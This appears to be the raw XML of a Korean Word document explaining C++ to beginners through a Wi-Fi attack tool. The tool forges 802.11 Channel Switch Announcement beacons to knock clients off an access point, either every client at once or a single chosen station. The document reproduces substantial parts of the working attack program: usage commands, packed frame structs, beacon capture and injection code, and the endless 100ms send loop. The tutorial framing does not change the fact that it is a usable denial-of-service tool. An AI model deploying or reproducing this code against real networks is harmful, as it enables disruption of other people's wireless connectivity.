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맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">CSA Attack C++ 코드 완전 해설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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">802.11 Channel Switch Announcement 공격 프로그램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333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">C++ 완전 초보자를 위한 문법 · 구조 · 동작 설명서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1. 프로그램 개요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이 프로그램은 와이파이(Wi-Fi) 네트워크를 공격하는 도구입니다. '802.11 CSA(Channel Switch Announcement)'라는 기능을 악용하여, 특정 AP(공유기)에 연결된 기기들을 다른 채널로 강제로 이동시켜 연결을 끊어버립니다.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실행 형태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csa-attack  &lt;인터페이스&gt;  &lt;AP MAC&gt;  [스테이션 MAC]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예시 1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csa-attack mon0 00:11:22:33:44:55  (방송 공격)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예시 2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csa-attack mon0 00:11:22:33:44:55 66:77:88:99:AA:BB  (유니캐스트)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동작 순서:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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 libpcap 라이브러리로 모니터 인터페이스에서 AP의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">beacon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 패킷을 1개 캡처</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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 패킷 앞쪽의 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Radiotap 헤더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분석해 끝에 FCS(4바이트)가 있으면 잘라냄</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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 패킷 내부에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="1A1A9C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CSA element (5바이트)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">를 정렬된 위치에 삽입</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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 필요하면 목적지 MAC 주소(DA)를 스테이션 MAC으로 교체</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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 짧은 대기 후 이 패킷을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무한 반복</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 전송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2. C++ 핵심 문법 설명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 #include — 다른 파일을 가져오기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#include는 다른 파일(헤더 파일)을 현재 파일 안으로 불러오는 전처리기 지시문입니다. 마치 요리하기 전에 재료를 준비하는 것과 같습니다.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#include &lt;cstdio&gt;    // C 표준 입출력 함수 (printf, snprintf 등)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#include &lt;vector&gt;    // std::vector (크기가 변하는 배열)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#include &lt;pcap.h&gt;    // 패킷 캡처 라이브러리 (외부 라이브러리)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="2E5FA3" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="D6E8FF" w:val="clear"/>
        <w:spacing w:after="200" w:before="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">규칙 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&lt;꺾쇠&gt;로 감싸면 시스템 헤더, "따옴표"로 감싸면 현재 폴더의 파일을 포함합니다.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 struct — 구조체 (여러 변수를 하나로 묶기)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struct는 서로 관련된 여러 변수들을 하나의 이름으로 묶는 문법입니다. 예를 들어 MAC 주소 6개의 숫자를 매번 따로 다루지 않고 Mac이라는 하나의 이름으로 묶어서 다룰 수 있습니다.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struct Mac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uint8_t mac_[6];   // 8비트(1바이트) 정수 6개 배열 → 총 6바이트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// ... 함수들 ...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};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Mac apMac;            // Mac 타입 변수 선언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apMac.mac_[0] = 0xAA; // 첫 번째 바이트에 접근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 uint8_t, uint16_t, uint32_t — 크기가 정해진 정수 타입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uint8_t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바이트 (8비트)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 ~ 255 사이의 정수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uint16_t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바이트 (16비트)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 ~ 65,535 사이의 정수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uint32_t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바이트 (32비트)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 ~ 4,294,967,295 사이의 정수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보통 4 바이트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음수도 포함한 정수 (-2,147,483,648 ~ +2,147,483,647)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size_t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또는 8 바이트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크기/길이를 나타내는 부호 없는 정수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바이트</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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true(참) 또는 false(거짓)만 저장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2.4  static const — 변하지 않는 고정 상수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const는 값을 변경할 수 없음을 의미합니다. static const는 프로그램 전체에서 공유하는 고정 상수입니다.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static const useconds_t SEND_INTERVAL_US = 100 * 1000;  // 100ms (마이크로초)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static const uint8_t    CSA_TAG_NUMBER   = 37;          // CSA element 번호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static const uint8_t    CSA_NEW_CHANNEL  = 11;          // 이동할 채널 번호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2.5  #pragma pack(push, 1) — 구조체 패딩 제거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보통 C++은 메모리 정렬을 위해 구조체 멤버 사이에 빈 공간(패딩)을 삽입합니다. 그러나 네트워크 패킷 구조는 byte가 딱 붙어 있어야 합니다. #pragma pack(push, 1)은 패딩을 없애서 구조체가 패킷 형식과 정확히 일치하도록 만듭니다.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#pragma pack(push, 1)   // ← 패딩 없이 꽉 채워 정렬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struct CsaTag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uint8_t tagNumber;  // 1바이트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uint8_t tagLength;  // 1바이트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uint8_t switchMode; // 1바이트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uint8_t newChannel; // 1바이트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uint8_t switchCount;// 1바이트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};  // 총 정확히 5바이트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#pragma pack(pop)        // ← 패딩 설정 원복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2.6  함수 — 반복 사용할 코드 블록 묶기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함수는 특정 작업을 수행하는 코드 묶음입니다. 반환 타입  함수이름(파라미터) { ... } 형식으로 작성합니다.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//  반환타입   함수이름   (파라미터)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int        main      (int argc, char* argv[])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// 이 안의 코드가 실행됨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return 0;  // 0 반환 → 정상 종료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}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="F0A500" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="FFF3CD" w:val="clear"/>
        <w:spacing w:after="200" w:before="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="F0A500"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">main()의 argc, argv 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argc = 명령줄 인자 개수,  argv[] = 인자 문자열 배열.  예: csa-attack mon0 AA:BB... 를 실행하면 argc=3, argv[0]="csa-attack", argv[1]="mon0", argv[2]="AA:BB..."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3. 구조체 메모리 구조 그림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각 구조체가 메모리에서 차지하는 바이트를 그림으로 보여줍니다. 한 칸 = 1바이트입니다.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 Mac 구조체 (6 bytes)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MAC 주소는 와이파이 기기의 고유 번호로, 6개의 1바이트 숫자로 구성됩니다 (예: AA:BB:CC:DD:EE:FF).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0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1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2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3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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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mac_[0]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mac_[1]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mac_[2]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mac_[3]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mac_[4]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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mac_[5]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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AA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BB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CC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DD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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EE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="150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FF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5FA3" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="D6E8FF" w:val="clear"/>
        <w:spacing w:after="200" w:before="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5FA3"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">예시 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MAC 주소 AA:BB:CC:DD:EE:FF 는 mac_[0]=0xAA, mac_[1]=0xBB, ..., mac_[5]=0xFF 로 저장됩니다.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 dot11RadioTap 구조체 (8 bytes)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모든 802.11 캡처 패킷 앞에 붙는 헤더로, 라디오(무선) 수신 정보를 담습니다. 앞 8바이트는 항상 같은 형식입니다.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2200"/>
        <w:gridCol w:w="4626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0
(1 B)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1
(1 B)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2-3
(2 B)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4-7
(4 B)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it_version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it_pad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it_len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it_present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항상 0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항상 0
(빈칸)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헤더 전체 길이
(리틀엔디안)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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어떤 필드가 포함되어 있는지
비트 플래그로 표시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리틀엔디안(LE)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이란? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">숫자를 메모리에 저장할 때 낮은 바이트를 먼저 저장하는 방식입니다. 예를 들어 0x0028(십진수 40)을 저장하면 메모리에는 28 00 순서로 저장됩니다.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 dot11MacHdr 구조체 (24 bytes)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802.11 관리 프레임(Beacon 등)의 MAC 헤더입니다. DA(목적지), SA(출발지), BSSID(AP 식별자) 등 주요 주소를 포함합니다.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700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1700"/>
        <w:gridCol w:w="1326"/>
      </w:tblGrid>
      <w:tr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0-1
(2 B)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2-3
(2 B)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4-9
(6 B)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10-15
(6 B)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16-21
(6 B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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22-23
(2 B)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frameControl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duration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addr1 (DA)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addr2 (SA)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addr3 (BSSID)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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seqCtrl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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프레임
종류/설정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전송
지속시간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수신 MAC
(목적지)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송신 MAC
(출발지)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 식별자
BSSID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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시퀀스
번호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6A1E9A" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="F3E5FF" w:val="clear"/>
        <w:spacing w:after="200" w:before="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6A1E9A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DA(Destination Address) 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패킷을 받을 대상의 MAC 주소입니다. broadcast 공격 시에는 FF:FF:FF:FF:FF:FF (모든 기기에게), unicast 공격 시에는 특정 스테이션 MAC으로 설정됩니다.</w:t>
      </w:r>
    </w:p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 CsaTag 구조체 (5 bytes)  — 핵심 공격 데이터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이것이 공격의 핵심입니다. 이 5바이트를 Beacon 패킷 안에 삽입함으로써 수신 기기가 채널을 바꾸도록 속입니다.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0
(1 B)</w:t>
            </w:r>
          </w:p>
        </w:tc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1
(1 B)</w:t>
            </w:r>
          </w:p>
        </w:tc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2
(1 B)</w:t>
            </w:r>
          </w:p>
        </w:tc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3
(1 B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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Byte 4
(1 B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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tagNumber</w:t>
            </w:r>
          </w:p>
        </w:tc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tagLength</w:t>
            </w:r>
          </w:p>
        </w:tc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switchMode</w:t>
            </w:r>
          </w:p>
        </w:tc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newChannel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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switchCount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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37 (0x25)
CSA 태그 번호</w:t>
            </w:r>
          </w:p>
        </w:tc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
뒤에 3바이트 더 있음</w:t>
            </w:r>
          </w:p>
        </w:tc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
전송 중단 요청</w:t>
            </w:r>
          </w:p>
        </w:tc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
새로 이동할 채널</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="180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
채널 전환까지
남은 비콘 횟수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 전송되는 패킷 전체 구조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프로그램이 실제로 전송하는 패킷은 아래와 같은 구조입니다. 각 색깔 블록이 하나의 구조체 또는 데이터 영역에 해당합니다.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1200"/>
        <w:gridCol w:w="3626"/>
      </w:tblGrid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구조체</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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맨앞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Radiotap Header (최소형)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 bytes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dot11RadioTap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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드라이버에 전송 파라미터 전달. 송신 시에는 최소 8바이트 헤더로 대체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↓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802.11 MAC Header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 bytes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dot11MacHdr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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DA/SA/BSSID 등 주소 정보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↓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Beacon Fixed Parameters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 bytes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(별도 없음)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Timestamp(8B) + Beacon Interval(2B) + Capability Info(2B)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↓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Tagged Parameters
(CSA 포함)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가변 길이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CsaTag 포함</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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SSID, 지원 속도 등 태그들 사이에 CSA element (5바이트) 삽입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4. main() 함수 단계별 해설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4.0  main() 전체 흐름 한눈에 보기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026"/>
      </w:tblGrid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코드 위치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하는 일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① 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L403-428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명령줄 인자 개수 확인 및 AP/Station MAC 파싱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② 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L431-450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libpcap으로 모니터 인터페이스 오픈, 링크 타입 확인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③ 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L452-454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Ctrl+C (SIGINT) 신호 핸들러 등록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④ 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L464-469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AP로부터 Beacon 패킷 1개 캡처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⑤ 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L472-481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캡처한 Beacon에 CSA element 삽입하여 공격 패킷 완성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⑥ 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L489-503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Ctrl+C 누를 때까지 공격 패킷 반복 전송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⑦ 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L506-508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결과 출력 후 pcap 핸들 정리하고 종료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 단계①  명령줄 인자 처리 (L403~428)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int main(int argc, char* argv[])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if (argc &lt; 3 || argc &gt; 4)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usage();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return 1;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}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const char* ifname  = argv[1];   // 인터페이스 이름 (예: mon0)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Mac apMac;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Mac staMac;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bool hasStation = false;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try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apMac = Mac(argv[2]);        // AP MAC 파싱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} catch (const std::invalid_argument&amp;)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std::cerr &lt;&lt; "AP MAC 주소 형식이 올바르지 않습니다\n";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return 1;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}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if (argc == 4)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staMac = Mac(argv[3]);       // Station MAC 파싱 (선택)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hasStation = true;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}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문법/키워드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argc, argv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argc = 인자 개수, argv = 인자 문자열 배열. argv[0]은 프로그램 이름 자체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||, &lt;, &gt;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논리 OR(||), 보다 작다(&lt;), 보다 크다(&gt;). if(argc&lt;3 || argc&gt;4) = "인자가 3개 미만이거나 4개 초과이면"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try/catch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예외처리: try 블록에서 문제가 발생하면 catch가 받아서 처리. MAC 주소 형식이 잘못되면 invalid_argument 예외가 발생함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const char*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수정 불가능한 문자열 포인터. 포인터(*)는 메모리 주소를 가리키는 변수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return 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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프로그램을 에러 코드 1로 종료. return 0은 정상 종료, return 1 이상은 오류 종료를 의미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 단계②  pcap 핸들 오픈 (L431~450)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char errbuf[PCAP_ERRBUF_SIZE] = {0};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pcap_t* pcap = pcap_open_live(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ifname,   // 인터페이스 이름 (예: mon0)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65535,    // snaplen: 한 번에 캡처할 최대 바이트 수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1,        // promisc: 1이면 모든 패킷 수신 (무차별 모드)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500,      // timeout: 500ms 대기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errbuf    // 오류 메시지 버퍼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);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if (!pcap)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std::cerr &lt;&lt; "pcap_open_live : " &lt;&lt; errbuf &lt;&lt; "\n";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return 1;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}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int dlt = pcap_datalink(pcap);           // 링크 타입 확인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if (dlt != DLT_IEEE802_11_RADIO) {       // Radiotap 모드가 아니면 에러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pcap_close(pcap);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return 1;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개념/함수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pcap_t*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pcap 라이브러리가 관리하는 핸들(handle). 포인터(*)로 받아서 이후 모든 pcap 함수에 전달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pcap_open_live()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실제 네트워크 인터페이스를 열어 패킷 캡처/송신이 가능한 상태로 만듦. 실패 시 NULL 반환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char errbuf[N] = {0}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크기 N의 문자 배열. ={0}으로 초기화하면 모든 바이트가 0(빈 문자열)으로 세팅됨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DLT_IEEE802_11_RADIO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인터페이스가 radiotap 헤더가 붙는 802.11 모니터 모드임을 나타내는 상수값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pcap_close(pcap)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열어둔 pcap 핸들을 닫아 메모리/리소스 해제. 사용 후 반드시 호출해야 함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 단계③  시그널 핸들러 등록 (L452~454)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// g_running 은 프로그램 최상단에 선언된 전역 변수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static std::atomic&lt;bool&gt; g_running(true);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// Ctrl+C 눌렸을 때 호출되는 함수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static void on_sigint(int /*sig*/) { g_running.store(false); }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// main 안에서 핸들러 등록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std::signal(SIGINT,  on_sigint);  // Ctrl+C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std::signal(SIGTERM, on_sigint);  // 종료 신호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개념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std::atomic&lt;bool&gt;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여러 스레드에서 안전하게 읽고 쓸 수 있는 bool 변수. atomic = "나눌 수 없는", 즉 중간에 끊기지 않는 작업을 보장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std::signal()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특정 OS 신호가 들어올 때 호출할 함수를 등록. SIGINT는 Ctrl+C, SIGTERM은 kill 명령으로 전달되는 종료 신호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g_running.store(false)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g_running 값을 false로 변경. 이 변수를 메인 루프에서 확인해서 false가 되면 루프를 빠져나감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 단계④  Beacon 캡처 (L464~469)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std::vector&lt;uint8_t&gt; beaconBuf;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if (!capture_first_beacon(pcap, apMac, beaconBuf))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pcap_close(pcap);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return 0;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}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std::cout &lt;&lt; "[+] captured beacon : " &lt;&lt; beaconBuf.size() &lt;&lt; " bytes\n";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개념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std::vector&lt;uint8_t&gt;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크기가 동적으로 변하는 배열. vector&lt;uint8_t&gt;는 1바이트 정수들의 가변 배열. 패킷 데이터를 담기에 적합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capture_first_beacon()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BPF 필터로 해당 AP의 beacon만 걸러서 첫 번째 패킷을 beaconBuf에 담는 함수. 성공하면 true 반환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!capture_...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! 는 논리 NOT. 함수가 false 반환(실패)하면 !false = true가 되어 if 블록 실행 (에러 처리)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beaconBuf.size()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vector의 현재 원소 개수 = 캡처한 패킷의 바이트 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4.5  단계⑤  CSA 프레임 빌드 (L472~481)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uint8_t outFrame[2048];      // 2048바이트 출력 버퍼 (스택에 할당)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size_t  outLen = build_csa_beacon(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outFrame,              // 출력 버퍼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sizeof(outFrame),      // 버퍼 크기 (2048)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beaconBuf.data(),      // 캡처한 패킷 데이터 포인터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beaconBuf.size(),      // 캡처한 패킷 길이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hasStation,            // true면 unicast, false면 broadcast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staMac                 // unicast 대상 MAC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);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if (outLen == 0)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std::cerr &lt;&lt; "CSA frame 생성 실패\n";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pcap_close(pcap);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return 1;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개념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uint8_t outFrame[2048]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스택에 2048바이트 배열 할당. 함수가 끝나면 자동 해제. 고정 크기 배열은 heap 할당(new)보다 빠름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sizeof(outFrame)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sizeof는 변수/타입의 바이트 크기를 컴파일 시점에 계산하는 연산자. sizeof(outFrame) = 2048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beaconBuf.data()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vector 내부 배열의 시작 주소(포인터)를 반환. 함수에 raw 포인터로 전달할 때 사용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build_csa_beacon()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캡처한 beacon에서 radiotap 제거, FCS 제거, CSA element 삽입, DA 교체를 수행하여 outFrame에 완성된 패킷을 씀. 반환값은 완성된 패킷 길이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4.6  단계⑥  패킷 반복 전송 루프 (L489~503)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unsigned long sent_ok   = 0;   // 성공한 전송 횟수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unsigned long sent_fail = 0;   // 실패한 전송 횟수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while (g_running.load()) {     // Ctrl+C 누를 때까지 반복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if (pcap_sendpacket(pcap, outFrame, (int)outLen) != 0)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++sent_fail;            // 전송 실패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} else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++sent_ok;              // 전송 성공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}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// 20번마다 한 번씩 상태 출력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if ((sent_ok + sent_fail) % PRINT_EVERY_N == 0) {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std::cout &lt;&lt; "[+] CSA sent : ok=" &lt;&lt; sent_ok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          &lt;&lt; " fail=" &lt;&lt; sent_fail &lt;&lt; "\n";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}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/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usleep(SEND_INTERVAL_US);  // 100ms 대기 (100*1000 마이크로초)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개념/문법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while (조건) { ... }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조건이 true인 동안 { } 안의 코드를 계속 반복. g_running.load()가 true(=아직 Ctrl+C 안 눌림)인 동안 무한 반복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g_running.load()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atomic 변수에서 현재 값을 안전하게 읽음. Ctrl+C가 눌리면 on_sigint()가 false로 바꾸고, 다음 루프에서 while이 종료됨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++sent_ok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증가 연산자. sent_ok = sent_ok + 1 과 동일. ++는 1씩 증가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 PRINT_EVERY_N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% 는 나머지(modulo) 연산자. (횟수 % 20 == 0)은 "20의 배수일 때"를 의미. 매 20번마다 화면에 출력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pcap_sendpacket()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만들어진 패킷(outFrame)을 네트워크로 실제 전송. 성공하면 0, 실패하면 0이 아닌 값 반환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usleep(N)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 마이크로초 동안 프로그램 일시 정지. 1,000,000 마이크로초 = 1초. 여기서는 100,000 = 0.1초 대기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4.7  단계⑦  종료 처리 (L506~508)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std::cout &lt;&lt; "\n[*] stopping ... total ok=" &lt;&lt; sent_ok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          &lt;&lt; " fail=" &lt;&lt; sent_fail &lt;&lt; "\n";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pcap_close(pcap);   // pcap 핸들 반환 (메모리 해제)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return 0;           // 정상 종료</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="1E7A3E" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="D4EDDA" w:val="clear"/>
        <w:spacing w:after="200" w:before="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E7A3E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">중요 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pcap_close()를 호출해야 커널이 잡아둔 네트워크 리소스가 해제됩니다. 이처럼 할당한 자원을 사용 후 반드시 돌려주는 것을 '리소스 관리'라고 합니다.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5. 전체 실행 흐름도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026"/>
        <w:gridCol w:w="700"/>
      </w:tblGrid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프로그램 시작  (main 진입)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인자 개수 확인 (3 또는 4개 아니면 usage 출력 후 종료)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 MAC 파싱 → 오류 시 에러 출력 후 종료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Station MAC 파싱 (4번째 인자가 있을 때만)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pcap_open_live() → 모니터 인터페이스 열기 → 실패 시 종료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⑤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pcap_datalink() → Radiotap 모드 확인 → 아니면 종료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A1E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⑥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std::signal() → Ctrl+C 핸들러 등록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⑦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capture_first_beacon() → BPF 필터 + AP Beacon 1개 캡처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⑧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build_csa_beacon() → Beacon에서 CSA frame 완성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⑨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while (g_running)  송신 루프 시작 (Ctrl+C 대기)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pcap_sendpacket() → outFrame 전송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20번마다 통계 출력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usleep(100ms) 대기 → 루프 반복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⑩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Ctrl+C 입력 → g_running = false → 루프 탈출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▼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끝</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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pcap_close() → 결과 출력 → return 0 (정상 종료)</w:t>
            </w:r>
          </w:p>
        </w:tc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6. 핵심 보조 함수 간단 설명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 radiotap_has_fcs()  — FCS 존재 여부 확인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캡처한 패킷 끝에 FCS(Frame Check Sequence, 4바이트 CRC 체크값)가 붙어있는지 radiotap 헤더의 플래그를 읽어 판단합니다. FCS가 있으면 끝에서 4바이트를 잘라내야 합니다.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// 동작 원리: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// 1) radiotap present flag에서 FLAGS 비트가 있는지 확인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// 2) FLAGS 필드의 0x10 비트(= RT_FLAG_FCS_AT_END)가 set 되어 있으면 true 반환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 find_csa_insert_pos()  — CSA 삽입 위치 탐색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Tagged Parameters 영역을 앞에서부터 훑으면서 tag number 순서(오름차순)에 맞는 삽입 위치를 찾습니다.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6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이미 CSA tag(37번)이 있음</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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그 자리 반환 + replaceExisting=true (덮어씀)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tag number &gt; 37 인 태그 발견</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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그 태그 바로 앞 위치 반환 (삽입)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끝까지 못 찾음</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6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가장 마지막 위치 반환 (추가)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 build_csa_beacon()  — 공격 패킷 완성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캡처된 원본 beacon에서 공격용 CSA 패킷을 만드는 핵심 함수입니다. 아래 순서로 동작합니다.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8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6B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작업 내용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8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radiotap header 길이 파싱 + FCS 여부 확인 → 802.11 프레임 시작/끝 계산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출력 버퍼 앞쪽에 최소 radiotap 헤더(8바이트) 작성 (it_version=0, it_pad=0, it_len=8, it_present=0)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8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802.11 헤더 + 바디를 버퍼에 그대로 복사 (FCS 제외)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3-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8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unicast 모드면 addr1(DA)을 station MAC으로 교체 (memcpy 6바이트)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find_csa_insert_pos()로 삽입 위치 탐색, memmove로 뒤쪽 데이터 밀어내기, CsaTag 5바이트 기록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3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완성된 패킷의 총 길이 반환 (0이면 실패)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 capture_first_beacon()  — Beacon 1개 캡처</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:cs="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:color w:val="111111"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pcap 라이브러리의 BPF(Berkeley Packet Filter)를 이용해서 특정 AP의 beacon 패킷만 골라 한 개 받습니다.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// BPF 필터 표현식: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"type mgt subtype beacon and wlan addr3 AA:BB:CC:DD:EE:FF"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F0F4FF" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="560"/>
      </w:pPr>
      <w:r>
        <w:rPr>
